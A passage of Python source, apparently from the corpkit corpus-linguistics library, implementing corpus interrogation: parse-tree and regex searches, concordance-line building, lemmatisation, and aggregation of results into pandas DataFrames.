<+(VP) (VP <<# /%s/)' % \\\n as_regex(processes.relational, boundaries='w'),\n 'Verbless clause': r'/^S/ !<< /^VB.?/'}\n\n for name, q in sorted(tregex_qs.items()):\n res = tregex_engine(query=q, \n options=['-o', '-C'], \n corpus=to_open, \n root=root\n )\n statsmode_results[name] += int(res)\n if root:\n root.update()\n return statsmode_results, []\n\n def make_conc_lines_from_whole_mid(wholes,\n middle_column_result\n ):\n \"\"\"\n Create concordance line output from tregex output\n \"\"\"\n import re\n import os\n if not wholes and not middle_column_result:\n return []\n\n conc_lines = []\n # remove duplicates from results\n unique_wholes = []\n unique_middle_column_result = []\n duplicates = []\n for (f, sk, whole), mid in zip(wholes, middle_column_result):\n joined = '-join-'.join([f, sk, whole, mid])\n if joined not in duplicates:\n duplicates.append(joined)\n unique_wholes.append([f, sk, whole])\n 
unique_middle_column_result.append(mid)\n\n # split into start, middle and end, dealing with multiple occurrences\n for (f, sk, whole), mid in zip(unique_wholes, unique_middle_column_result):\n reg = re.compile(r'([^a-zA-Z0-9-]|^)(' + re.escape(mid) + r')([^a-zA-Z0-9-]|$)', \\\n re.IGNORECASE | re.UNICODE)\n offsets = [(m.start(), m.end()) for m in re.finditer(reg, whole)]\n for offstart, offend in offsets:\n start, middle, end = whole[0:offstart].strip(), whole[offstart:offend].strip(), \\\n whole[offend:].strip()\n conc_lines.append([os.path.basename(f), sk, start, middle, end])\n return conc_lines\n\n def uniquify(conc_lines):\n \"\"\"get unique concordance lines\"\"\"\n from collections import OrderedDict\n unique_lines = []\n checking = []\n for index, (_, speakr, start, middle, end) in enumerate(conc_lines):\n joined = ' '.join([speakr, start, 'MIDDLEHERE:', middle, ':MIDDLEHERE', end])\n if joined not in checking:\n unique_lines.append(conc_lines[index])\n checking.append(joined)\n return unique_lines\n\n def lemmatiser(list_of_words, tag):\n \"\"\"\n Take a list of unicode words and a tag and return a lemmatised list\n \"\"\"\n output = []\n for word in list_of_words:\n if translated_option.startswith('u'):\n word = taglemma.get(word.lower(), 'Other')\n else:\n word = wordlist.get(word, lmtzr.lemmatize(word, tag))\n if not preserve_case:\n word = word.lower()\n output.append(word)\n return output\n\n def tgrep_searcher(sents, search, show, conc, **kwargs):\n \"\"\"\n Use tgrep for constituency grammar search\n \"\"\"\n f = kwargs.get('filename')\n from corpkit.process import show_tree_as_per_option, tgrep\n out = []\n conc_output = []\n conc_out = []\n for sent in sents:\n sk = get_speakername(sent)\n results = tgrep(sent, search['t'])\n for res in results:\n out.append(show_tree_as_per_option(show, res, sent))\n if conc:\n lin = [f, sk, show_tree_as_per_option(show + ['whole'], res, sent)]\n conc_out.append(lin)\n\n if conc:\n conc_output = 
make_conc_lines_from_whole_mid(conc_out, out)\n return out, conc_output\n\n def gettag(query, lemmatag=False):\n \"\"\"\n Find tag for WordNet lemmatisation\n \"\"\"\n if lemmatag:\n return lemmatag\n\n tagdict = {'N': 'n',\n 'J': 'a',\n 'V': 'v',\n 'A': 'r',\n 'None': False,\n '': False,\n 'Off': False}\n\n # in case someone compiles the tregex query\n try:\n query = query.pattern\n except AttributeError:\n query = query\n \n\n qr = query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', '')\n firstletter = next((c for c in qr if c.isalpha()), 'n')\n return tagdict.get(firstletter.upper(), 'n')\n\n def format_tregex(results, whole=False):\n \"\"\"format tregex by show list\"\"\"\n import re\n\n if countmode:\n return results\n\n if not results:\n return\n\n done = []\n if whole:\n fnames, snames, results = zip(*results)\n\n if 'l' in show or 'x' in show:\n lemmata = lemmatiser(results, gettag(search.get('t'), lemmatag))\n else:\n lemmata = [None for i in results]\n for word, lemma in zip(results, lemmata):\n bits = []\n if exclude and exclude.get('w'):\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('w'), word):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('l'), lemma):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('p'), word):\n continue\n if len(list(exclude.keys())) == 1 or excludemode == 'any':\n if re.search(exclude.get('x'), lemma):\n continue\n if exclude and excludemode == 'all':\n num_to_cause_exclude = len(list(exclude.keys()))\n current_num = 0\n if exclude.get('w'):\n if re.search(exclude.get('w'), word):\n current_num += 1\n if exclude.get('l'):\n if re.search(exclude.get('l'), lemma):\n current_num += 1\n if exclude.get('p'):\n if re.search(exclude.get('p'), word):\n current_num += 1\n if exclude.get('x'):\n if re.search(exclude.get('x'), lemma):\n current_num += 1 \n if current_num == 
num_to_cause_exclude:\n continue \n\n for i in show:\n if i == 't':\n bits.append(word)\n if i == 'l':\n bits.append(lemma)\n elif i == 'w':\n bits.append(word)\n elif i == 'p':\n bits.append(word)\n elif i == 'x':\n bits.append(lemma)\n joined = '/'.join(bits)\n done.append(joined)\n if whole:\n done = zip(fnames, snames, done)\n return done\n\n def tok_by_list(pattern, list_of_toks, concordancing=False, **kwargs):\n \"\"\"search for regex in plaintext corpora\"\"\"\n import re\n if isinstance(pattern, STRINGTYPE):\n pattern = [pattern]\n if not case_sensitive:\n pattern = [p.lower() for p in pattern]\n if not concordancing:\n if case_sensitive:\n matches = [m for m in list_of_toks if m in pattern]\n else:\n matches = [m for m in list_of_toks if m.lower() in pattern]\n else:\n matches = []\n for index, token in enumerate(list_of_toks):\n if token in pattern:\n if not split_contractions:\n match = [' '.join(t for t in unsplitter(list_of_toks[:index]))[-140:]]\n else:\n match = [' '.join(t for t in list_of_toks[:index])[-140:]]\n match.append(token)\n if not split_contractions:\n match.append(' '.join(t for t in unsplitter(list_of_toks[index + 1:]))[:140])\n else:\n match.append(' '.join(t for t in list_of_toks[index + 1:])[:140])\n\n matches.append(match)\n if countmode:\n return len(matches)\n else:\n return matches\n\n def tok_ngrams(pattern, list_of_toks, concordancing=False, split_contractions=True):\n import re\n result = []\n list_of_toks = [x for x in list_of_toks if re.search(regex_nonword_filter, x)]\n\n if not split_contractions:\n list_of_toks = unsplitter(list_of_toks)\n \n for i in range(len(list_of_toks)):\n try:\n the_gram = [list_of_toks[i+x] for x in range(gramsize)]\n if any(re.search(pattern, x) for x in the_gram):\n result.append(' '.join(the_gram))\n except IndexError:\n pass\n\n if countmode:\n return len(result)\n\n else:\n result = [i for i in result if result.count(i) > 1]\n return result\n\n def compiler(pattern):\n \"\"\"compile regex or 
fail gracefully\"\"\"\n if hasattr(pattern, 'pattern'):\n return pattern\n import re\n try:\n if case_sensitive:\n comped = re.compile(pattern)\n else:\n comped = re.compile(pattern, re.IGNORECASE)\n return comped\n except:\n import traceback\n import sys\n from time import localtime, strftime\n exc_type, exc_value, exc_traceback = sys.exc_info()\n lst = traceback.format_exception(exc_type, exc_value, exc_traceback)\n error_message = lst[-1]\n thetime = strftime(\"%H:%M:%S\", localtime())\n print('%s: Query %s' % (thetime, error_message))\n if root:\n return 'Bad query'\n else:\n raise ValueError('%s: Query %s' % (thetime, error_message))\n\n def tok_by_reg(pattern, list_of_toks, concordancing = False, **kwargs):\n \"\"\"search for regex in plaintext corpora\"\"\"\n import re\n comped = compiler(pattern)\n if comped == 'Bad query':\n return 'Bad query'\n if not concordancing:\n matches = [m for m in list_of_toks if re.search(comped, m)]\n else:\n matches = []\n for index, token in enumerate(list_of_toks):\n if re.search(comped, token):\n if not split_contractions:\n match = [' '.join(t for t in unsplitter(list_of_toks[:index]))[-140:]]\n else:\n match = [' '.join(t for t in list_of_toks[:index])[-140:]]\n match.append(re.search(comped, token).group(0))\n if not split_contractions:\n match.append(' '.join(t for t in unsplitter(list_of_toks[index + 1:]))[:140])\n else:\n match.append(' '.join(t for t in list_of_toks[index + 1:])[:140])\n matches.append(match)\n if countmode:\n return len(matches)\n else:\n return matches\n\n def determine_search_func(show):\n \"\"\"Figure out what search function we're using\"\"\"\n\n simple_tregex_mode = False\n statsmode = False\n tree_to_text = False\n\n if search.get('t') and not just_speakers and not kwargs.get('tgrep'):\n if have_java:\n simple_tregex_mode = True\n searcher = None\n else:\n searcher = tgrep_searcher\n optiontext = 'Searching parse trees'\n else:\n if datatype == 'plaintext':\n if any(i.endswith('n') for i in 
search.keys()):\n optiontext = 'n-grams via plaintext'\n raise NotImplementedError('Use a tokenised or parsed corpus for n-gramming.')\n #searcher = plaintext_ngram\n elif any(i.endswith('w') for i in search.keys()):\n if kwargs.get('regex', True):\n searcher = plaintext_regex_search\n else:\n searcher = plaintext_simple_search\n optiontext = 'Searching plaintext'\n else:\n raise ValueError(\"Plaintext search must be 'w' or 'n'.\")\n\n elif datatype == 'tokens':\n if any(i.endswith('n') for i in search.keys()):\n searcher = tok_ngrams\n optiontext = 'n-grams via tokens'\n elif any(i.endswith('w') for i in search.keys()):\n if kwargs.get('regex', True):\n searcher = tok_by_reg\n else:\n searcher = tok_by_list\n if isinstance(search.get('w'), (list, Wordlist)):\n searcher = tok_by_list\n optiontext = 'Searching tokens'\n only_parse = ['r', 'd', 'g', 'dl', 'gl', 'df', 'gf',\n 'dp', 'gp', 'f', 'd2', 'd2f', 'd2p', 'd2l']\n \n\n if datatype != 'parse' and any(i in only_parse for i in list(search.keys())):\n form = ', '.join(i for i in list(search.keys()) if i in only_parse)\n raise ValueError('Need parsed corpus to search with \"%s\" option(s).' 
% form)\n\n elif datatype == 'parse':\n if any(i.endswith('n') for i in search.keys()):\n search['w'] = search.pop('n')\n if not show_ngram:\n show = ['n']\n if any(i.endswith('t') for i in search.keys()):\n if have_java and not kwargs.get('tgrep'):\n searcher = slow_tregex\n else:\n searcher = tgrep_searcher\n optiontext = 'Searching parse trees'\n elif any(i.endswith('s') for i in search.keys()):\n searcher = get_stats\n statsmode = True\n optiontext = 'General statistics'\n elif any(i.endswith('r') for i in search.keys()):\n from corpkit.depsearch import dep_searcher\n searcher = dep_searcher\n optiontext = 'Distance from root'\n else:\n from corpkit.depsearch import dep_searcher\n searcher = dep_searcher\n optiontext = 'Dependency querying'\n \n # ngram mode for parsed data\n if show_ngram:\n optiontext = 'N-grams from parsed data'\n searcher = dep_searcher\n\n return searcher, optiontext, simple_tregex_mode, statsmode, tree_to_text\n\n def get_tregex_values():\n \"\"\"If using Tregex, set appropriate values\n\n - Check for valid query\n - Make 'any' query\n - Make list query\n \"\"\"\n\n translated_option = 't'\n if isinstance(search['t'], Wordlist):\n search['t'] = list(search['t'])\n q = tregex_engine(corpus=False,\n query=search.get('t'),\n options=['-t'],\n check_query=True,\n root=root,\n preserve_case=preserve_case\n )\n if q is False:\n if root:\n return 'Bad query', None\n else:\n return 'Bad query', None\n\n if isinstance(search['t'], list):\n regex = as_regex(search['t'], boundaries='line', case_sensitive=case_sensitive)\n else:\n regex = ''\n\n # listquery, anyquery, translated_option\n treg_dict = {'p': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 'pl': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 'x': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'u'],\n 't': [r'__ < (/%s/ !< __)' % regex, r'__ < (/.?[A-Za-z0-9].?/ !< __)', 'o'],\n 'w': [r'/%s/ !< __' % regex, 
r'/.?[A-Za-z0-9].?/ !< __', 't'],\n 'c': [r'/%s/ !< __' % regex, r'/.?[A-Za-z0-9].?/ !< __', 'C'],\n 'l': [r'/%s/ !< __' % regex, r'/.?[A-Za-z0-9].?/ !< __', 't']\n }\n\n listq, anyq, translated_option = treg_dict.get(show[0].lower())\n if isinstance(search['t'], list):\n search['t'] = listq\n elif search['t'] == 'any': \n search['t'] = anyq\n return search['t'], translated_option\n\n def plaintext_regex_search(pattern, plaintext_data, concordancing=False, **kwargs):\n \"\"\"search for regex in plaintext corpora\n\n it searches over lines, so the user needs to be careful.\n \"\"\"\n import re\n if concordancing:\n pattern = r'(.{,140})\\b(' + pattern + r')\\b(.{,140})'\n compiled_pattern = compiler(pattern)\n if compiled_pattern == 'Bad query':\n return 'Bad query'\n matches = re.findall(compiled_pattern, plaintext_data)\n if concordancing:\n matches = [list(m) for m in matches]\n if not concordancing:\n for index, i in enumerate(matches):\n if isinstance(i, tuple):\n matches[index] = i[0]\n if countmode:\n return len(matches)\n else:\n return matches\n\n def correct_spelling(a_string):\n \"\"\"correct spelling within a string\"\"\"\n if not spelling:\n return a_string\n from corpkit.dictionaries.word_transforms import usa_convert\n if spelling.lower() == 'uk':\n usa_convert = {v: k for k, v in list(usa_convert.items())}\n bits = a_string.split('/')\n for index, i in enumerate(bits):\n converted = usa_convert.get(i.lower(), i)\n if i.islower() or preserve_case is False:\n converted = converted.lower()\n elif i.isupper() and preserve_case:\n converted = converted.upper()\n elif i.istitle() and preserve_case:\n converted = converted.title()\n bits[index] = converted\n r = '/'.join(bits)\n return r\n\n def plaintext_simple_search(pattern, plaintext_data, concordancing=False, **kwargs):\n \"\"\"search for tokens in plaintext corpora\"\"\"\n import re\n result = []\n if isinstance(pattern, STRINGTYPE):\n pattern = [pattern]\n for p in pattern:\n if concordancing:\n pat 
= r'(.{0,140})\\b(' + re.escape(p) + r')\\b(.{0,140})'\n pat = compiler(pat)\n if pat == 'Bad query':\n return 'Bad query'\n matches = re.findall(pat, plaintext_data)\n if concordancing:\n matches = [list(m) for m in matches]\n for i in matches:\n result.append(i)\n else: \n for m in range(len(matches)):\n result.append(p)\n return result\n\n def make_search_iterable(corpus):\n \"\"\"determine how to structure the corpus for interrogation\"\"\"\n \n # skip file definitions if they are not needed\n if simple_tregex_mode:\n if corpus.level in ['s', 'f']:\n return {(corpus.name, corpus.path): False}\n else:\n return {(os.path.basename(i), os.path.join(corpus.path, i)): False\n for i in os.listdir(corpus.path)\n if os.path.isdir(os.path.join(corpus.path, i))}\n\n if isinstance(corpus, Datalist):\n to_iterate_over = {}\n # it could be files or subcorpus objects\n if corpus[0].level == 's':\n if files_as_subcorpora:\n for subc in corpus:\n for f in subc.files:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n for subc in corpus:\n to_iterate_over[(subc.name, subc.path)] = subc.files\n elif corpus[0].level == 'f':\n for f in corpus:\n to_iterate_over[(f.name, f.path)] = [f]\n elif corpus.singlefile:\n to_iterate_over = {(corpus.name, corpus.path): [corpus]}\n elif not hasattr(corpus, 'subcorpora') or not corpus.subcorpora:\n # just files in a directory\n if files_as_subcorpora:\n to_iterate_over = {}\n for f in corpus.files:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n to_iterate_over = {(corpus.name, corpus.path): corpus.files}\n else:\n to_iterate_over = {}\n if files_as_subcorpora:\n # don't know if possible: has subcorpora but also .files\n if hasattr(corpus, 'files') and corpus.files is not None:\n for f in corpus.files:\n to_iterate_over[(f.name, f.path)] = [f]\n # has subcorpora with files in those\n elif hasattr(corpus, 'files') and corpus.files is None:\n for subc in corpus.subcorpora:\n for f in subc.files:\n to_iterate_over[(f.name, f.path)] = [f]\n 
else:\n if corpus[0].level == 's':\n for subcorpus in corpus:\n to_iterate_over[(subcorpus.name, subcorpus.path)] = subcorpus.files\n elif corpus[0].level == 'f':\n for f in corpus:\n to_iterate_over[(f.name, f.path)] = [f]\n else:\n for subcorpus in corpus.subcorpora:\n to_iterate_over[(subcorpus.name, subcorpus.path)] = subcorpus.files\n return to_iterate_over\n\n def welcome_printer(return_it=False):\n \"\"\"Print welcome message\"\"\"\n if no_conc:\n message = 'Interrogating'\n else:\n message = 'Interrogating and concordancing'\n if kwargs.get('printstatus', True):\n thetime = strftime(\"%H:%M:%S\", localtime())\n from corpkit.constants import transshow, transobjs\n sformat = '\\n'\n for k, v in search.items():\n if k == 't':\n dratt = ''\n else:\n dratt = transshow.get(k[-1], k[-1])\n drole = transobjs.get(k[0], k[0])\n if k == 't':\n drole = 'Trees'\n vform = getattr(v, 'pattern', v)\n sformat += ' %s %s: %s\\n' % (drole, dratt.lower(), vform)\n if search.get('s'):\n sformat = 'Features'\n welcome = ('\\n%s: %s %s ...\\n %s\\n ' \\\n 'Query: %s\\n %s corpus ... \\n' % \\\n (thetime, message, cname, optiontext, sformat, message))\n if return_it:\n return welcome\n else:\n print(welcome)\n\n def goodbye_printer(return_it=False, only_conc=False):\n \"\"\"Say goodbye before exiting\"\"\"\n if not kwargs.get('printstatus', True):\n return\n thetime = strftime(\"%H:%M:%S\", localtime())\n if only_conc:\n \n show_me = (thetime, len(conc_df))\n finalstring = '\\n\\n%s: Concordancing finished! %d results.' % show_me\n else:\n finalstring = '\\n\\n%s: Interrogation finished!' % thetime\n if countmode:\n finalstring += ' %d matches.' % tot\n else:\n dat = (numentries, total_total)\n finalstring += ' %d unique results, %d total occurrences.' 
% dat\n if return_it:\n return finalstring\n else:\n print(finalstring)\n\n\n def make_conc_obj_from_conclines(conc_results):\n \"\"\"\n Turn conclines into DataFrame\n \"\"\"\n from corpkit.interrogation import Concordance\n all_conc_lines = []\n for sc_name, resu in sorted(conc_results.items()):\n if only_unique:\n unique_results = uniquify(resu)\n else:\n unique_results = resu\n #make into series\n if PYTHON_VERSION == 2:\n pindex = 'c f s l m r'.encode('utf-8').split()\n else:\n pindex = 'c f s l m r'.split()\n for fname, spkr, start, word, end in unique_results:\n #spkr = str(spkr, errors = 'ignore')\n fname = os.path.basename(fname)\n ser = [sc_name, fname, spkr, start, word, end]\n all_conc_lines.append(Series(ser, index=pindex))\n\n if random:\n from random import shuffle\n shuffle(all_conc_lines)\n\n try:\n conc_df = pd.concat(all_conc_lines, axis=1).T\n if all(x == '' for x in list(conc_df['s'].values)):\n conc_df.drop('s', axis=1, inplace=True)\n \n if show_ngram or show_collocates:\n if not language_model:\n counted = Counter(conc_df['m'])\n indices = [l for l in list(conc_df.index) if counted[conc_df.ix[l]['m']] > 1] \n conc_df = conc_df.ix[indices]\n conc_df = conc_df.reset_index(drop=True)\n\n locs['corpus'] = corpus.name\n conc_df = Concordance(conc_df)\n try:\n conc_df.query = locs\n except AttributeError:\n pass\n return conc_df\n\n except ValueError:\n return\n\n def make_progress_bar():\n \"\"\"generate a progress bar\"\"\"\n\n if simple_tregex_mode:\n total_files = len(list(to_iterate_over.keys()))\n else:\n total_files = sum(len(x) for x in list(to_iterate_over.values()))\n\n par_args = {'printstatus': kwargs.get('printstatus', True),\n 'root': root, \n 'note': note,\n 'length': total_files,\n 'startnum': kwargs.get('startnum'),\n 'denom': kwargs.get('denominator', 1)}\n\n term = None\n if kwargs.get('paralleling', None) is not None:\n from blessings import Terminal\n term = Terminal()\n par_args['terminal'] = term\n par_args['linenum'] = 
kwargs.get('paralleling')\n\n if in_notebook:\n par_args['welcome_message'] = welcome_message\n\n outn = kwargs.get('outname', '')\n if outn:\n outn = outn + ': '\n\n tstr = '%s%d/%d' % (outn, current_iter, total_files)\n p = animator(None, None, init=True, tot_string=tstr, **par_args)\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n return p, outn, total_files, par_args\n\n # find out if using gui\n root = kwargs.get('root')\n note = kwargs.get('note')\n language_model = kwargs.get('language_model')\n\n # set up pause method\n original_sigint = signal.getsignal(signal.SIGINT)\n if kwargs.get('paralleling', None) is None:\n original_sigint = signal.getsignal(signal.SIGINT)\n signal.signal(signal.SIGINT, signal_handler)\n\n # find out about concordancing\n only_conc = False\n no_conc = False\n if conc is False:\n no_conc = True\n if isinstance(conc, str) and conc.lower() == 'only':\n only_conc = True\n no_conc = False\n numconc = 0\n\n # wipe non essential class attributes to not bloat query attrib\n if isinstance(corpus, Corpus):\n import copy\n corpus = copy.copy(corpus)\n for k, v in corpus.__dict__.items():\n if isinstance(v, (Interrogation, Interrodict)):\n corpus.__dict__.pop(k, None)\n\n # convert path to corpus object\n if not isinstance(corpus, (Corpus, Corpora, Subcorpus, File, Datalist)):\n if not multiprocess and not kwargs.get('outname'):\n corpus = Corpus(corpus, print_info=False)\n\n # figure out how the user has entered the query and show, and normalise\n from corpkit.process import searchfixer\n search = searchfixer(search, query)\n show = fix_show(show)\n \n show_ngram = any(x.startswith('n') for x in show)\n show_collocates = any(x.startswith('b') for x in show)\n\n # instantiate lemmatiser if need be\n if 'l' in show and isinstance(search, dict) and search.get('t'):\n from nltk.stem.wordnet import WordNetLemmatizer\n lmtzr = WordNetLemmatizer()\n\n # do multiprocessing if need be\n im, 
corpus, search, query, just_speakers = is_multiquery(corpus, search, query, just_speakers)\n\n # figure out if we can multiprocess the corpus\n if hasattr(corpus, '__iter__') and im:\n corpus = Corpus(corpus)\n if hasattr(corpus, '__iter__') and not im:\n im = True\n if isinstance(corpus, Corpora):\n im = True\n\n # split corpus if the user wants multiprocessing but no other iterable\n if not im and multiprocess:\n im = True\n corpus = corpus[:]\n\n search = fix_search(search)\n exclude = fix_search(exclude)\n\n # if it's already been through pmultiquery, don't do it again\n locs['search'] = search\n locs['query'] = query\n locs['just_speakers'] = just_speakers\n locs['corpus'] = corpus\n locs['multiprocess'] = multiprocess\n locs['print_info'] = kwargs.get('printstatus', True)\n\n # send to multiprocess function\n if im:\n signal.signal(signal.SIGINT, original_sigint)\n from corpkit.multiprocess import pmultiquery\n return pmultiquery(**locs)\n\n # get corpus metadata\n cname = corpus.name\n if isinstance(save, STRINGTYPE):\n savename = corpus.name + '-' + save\n if save is True:\n raise ValueError('save must be str, not bool.')\n\n\n datatype = getattr(corpus, 'datatype', 'parse')\n singlefile = getattr(corpus, 'singlefile', False)\n level = getattr(corpus, 'level', 'c')\n \n # store all results in here\n results = {}\n count_results = {}\n conc_results = {}\n\n # check if just counting, turn off conc if so\n countmode = 'c' in show\n if countmode:\n no_conc = True\n only_conc = False\n # where we are at in interrogation\n current_iter = 0\n\n # multiprocessing progress bar\n denom = kwargs.get('denominator', 1)\n startnum = kwargs.get('startnum', 0)\n\n # Determine the search function to be used #\n searcher, optiontext, simple_tregex_mode, statsmode, tree_to_text = determine_search_func(show)\n \n # no conc for statsmode\n if statsmode:\n no_conc = True\n only_conc = False\n conc = False\n\n # Set some Tregex-related values\n if search.get('t'):\n if 
show_ngram:\n raise ValueError(\"Can't search trees for n-grams---use a dependency search.\")\n query, translated_option = get_tregex_values()\n if query == 'Bad query' and translated_option is None:\n if root:\n return 'Bad query'\n else:\n return\n # more tregex options\n if tree_to_text:\n treg_q = r'ROOT << __'\n op = ['-o', '-t', '-w']\n elif simple_tregex_mode:\n treg_q = search['t']\n op = ['-o', '-' + translated_option]\n\n # make iterable object for corpus interrogation\n to_iterate_over = make_search_iterable(corpus)\n\n from traitlets import TraitError\n try:\n from ipywidgets import IntProgress\n\n _ = IntProgress(min=0, max=10, value=1)\n in_notebook = True\n except TraitError:\n in_notebook = False\n except ImportError:\n in_notebook = False\n\n # print welcome message\n welcome_message = welcome_printer(return_it=in_notebook)\n\n # create a progress bar\n p, outn, total_files, par_args = make_progress_bar()\n\n # Iterate over data, doing interrogations\n for (subcorpus_name, subcorpus_path), files in sorted(to_iterate_over.items()):\n\n # results for subcorpus go here\n conc_results[subcorpus_name] = []\n count_results[subcorpus_name] = []\n results[subcorpus_name] = Counter()\n\n # get either everything (tree_to_text) or the search['t'] query\n if tree_to_text or simple_tregex_mode:\n result = tregex_engine(query=treg_q,\n options=op,\n corpus=subcorpus_path,\n root=root,\n preserve_case=preserve_case\n )\n\n # format search results with slashes etc\n if not countmode and not tree_to_text:\n result = format_tregex(result)\n\n # if concordancing, do the query again with 'whole' sent and fname\n if not no_conc:\n ops = ['-w', '-f'] + op\n whole_result = tregex_engine(query=search['t'],\n options=ops,\n corpus=subcorpus_path,\n root=root,\n preserve_case=preserve_case\n )\n for line in whole_result:\n line.insert(1, '') \n\n # format match too depending on option\n if not only_format_match:\n whole_result = format_tregex(whole_result, whole=True)\n\n # 
make conc lines from conc results\n conc_result = make_conc_lines_from_whole_mid(whole_result, result)\n for lin in conc_result:\n if numconc < maxconc or not maxconc:\n conc_results[subcorpus_name].append(lin)\n numconc += 1\n\n # add matches to ongoing counts\n if countmode:\n count_results[subcorpus_name] += [result] \n else:\n result = Counter(result)\n results[subcorpus_name] += result\n\n # update progress bar\n current_iter += 1\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n\n # dependencies, plaintext, tokens, slow_tregex and tree_to_text\n if not simple_tregex_mode:\n for f in files:\n slow_treg_speaker_guess = kwargs.get('outname', False)\n if datatype == 'parse' and not tree_to_text:\n # right now, this is not using the File class's read() or document\n # methods. the reason is that there seem to be memory leaks. these\n # may have been fixed already though.\n try:\n from corenlp_xml import Document\n except ImportError:\n from corenlp_xml.document import Document\n with codecs.open(f.path, 'rb') as fo:\n data = fo.read()\n corenlp_xml = Document(data)\n #corenlp_xml = f.document\n if just_speakers:\n import re\n if isinstance(just_speakers, re._pattern_type):\n sents = [s for s in corenlp_xml.sentences if \\\n re.search(just_speakers, get_speakername(s))]\n else:\n sents = [s for s in corenlp_xml.sentences if get_speakername(s) in just_speakers]\n if len(just_speakers) == 1:\n slow_treg_speaker_guess = just_speakers[0]\n else:\n sents = corenlp_xml.sentences\n\n # get coreferences\n if kwargs.get('coref') or any(x.startswith('h') for x in show):\n if just_speakers:\n corefs = [i for i in corenlp_xml.coreferences if any(x == i.sentence for x in sents)]\n else:\n corefs = corenlp_xml.coreferences\n else:\n corefs = []\n \n corenlp_xml = None\n\n res, conc_res = searcher(sents, search=search, show=show,\n dep_type=dep_type,\n exclude=exclude,\n excludemode=excludemode,\n searchmode=searchmode,\n 
case_sensitive=case_sensitive,\n conc=conc,\n only_format_match=only_format_match,\n speaker=slow_treg_speaker_guess,\n gramsize=gramsize,\n no_punct=no_punct,\n no_closed=no_closed,\n whitelist=whitelist,\n split_contractions=split_contractions,\n window=window,\n filename=f.name,\n language_model=language_model,\n corefs=corefs,\n is_a_word=is_a_word,\n **kwargs\n )\n \n if res == 'Bad query':\n return 'Bad query'\n\n if datatype == 'tokens':\n import pickle\n with codecs.open(f.path, \"rb\") as fo:\n data = pickle.load(fo)\n elif datatype == 'plaintext' or tree_to_text:\n if tree_to_text:\n data = '\\n'.join(result)\n if not split_contractions:\n data = unsplitter(data)\n else:\n with codecs.open(f.path, 'rb', encoding='utf-8') as data:\n data = data.read()\n\n if datatype == 'tokens' or datatype == 'plaintext':\n\n query = list(search.values())[0]\n\n if not only_conc:\n res = searcher(query,\n data,\n split_contractions=split_contractions, \n concordancing=False\n )\n if res == 'Bad query':\n if root:\n return 'Bad query'\n if not no_conc:\n conc_res = searcher(query,\n data,\n split_contractions=split_contractions, \n concordancing=True\n )\n if conc_res == 'Bad query':\n if root:\n return 'Bad query'\n for line in conc_res:\n line.insert(0, '')\n\n if countmode:\n count_results[subcorpus_name] += [res]\n\n else:\n # add filename and do lowercasing for conc\n if not no_conc:\n for line in conc_res:\n if searcher != slow_tregex and searcher != tgrep_searcher:\n line.insert(0, f.name)\n else:\n line[0] = f.name\n if not preserve_case:\n line[3:] = [x.lower() for x in line[3:]]\n if spelling:\n line = [correct_spelling(b) for b in line]\n if numconc < maxconc or not maxconc:\n conc_results[subcorpus_name].append(line)\n numconc += 1\n\n # do lowercasing and spelling\n if not only_conc:\n if not preserve_case:\n if not statsmode:\n res = [i.lower() for i in res]\n\n if spelling:\n if not statsmode:\n res = [correct_spelling(r) for r in res]\n #if not statsmode:\n 
results[subcorpus_name] += Counter(res)\n #else:\n #results[subcorpus_name] += res\n\n # update progress bar\n current_iter += 1\n tstr = '%s%d/%d' % (outn, current_iter + 1, total_files)\n animator(p, current_iter, tstr, **par_args)\n\n # Get concordances into DataFrame, return if just conc\n if not no_conc:\n # fail on this line with typeerror if no results?\n conc_df = make_conc_obj_from_conclines(conc_results)\n\n if only_conc:\n locs = sanitise_dict(locs)\n try:\n conc_df.query = locs\n except AttributeError:\n return conc_df\n if save and not kwargs.get('outname'):\n print('\\n')\n conc_df.save(savename)\n goodbye_printer(only_conc=True)\n signal.signal(signal.SIGINT, original_sigint) \n return conc_df\n else:\n conc_df = None\n\n # Get interrogation into DataFrame\n if countmode:\n df = Series({k: sum(v) for k, v in sorted(count_results.items())})\n tot = df.sum()\n else:\n the_big_dict = {}\n unique_results = set(item for sublist in list(results.values()) for item in sublist)\n sortres = sorted(results.items(), key=lambda x: x[0])\n for word in unique_results:\n the_big_dict[word] = [subcorp_result[word] for _, subcorp_result in sortres]\n # turn master dict into dataframe, sorted\n df = DataFrame(the_big_dict, index=sorted(results.keys()))\n\n # for ngrams, remove hapaxes\n if show_ngram or show_collocates:\n if not language_model:\n df = df[[i for i in list(df.columns) if df[i].sum() > 1]]\n\n numentries = len(df.columns)\n tot = df.sum(axis=1)\n total_total = df.sum().sum()\n\n # turn df into series if all conditions met\n if not countmode:\n if level == 's' or singlefile:\n if not files_as_subcorpora:\n if not kwargs.get('df1_always_df'):\n df = Series(df.ix[0])\n df.sort_values(ascending=False, inplace=True)\n tot = df.sum()\n numentries = len(df.index)\n total_total = tot\n\n # turn data into DF for GUI if need be\n if isinstance(df, Series) and kwargs.get('df1_always_df'):\n total_total = df.sum()\n df = DataFrame(df)\n tot = Series(total_total, 
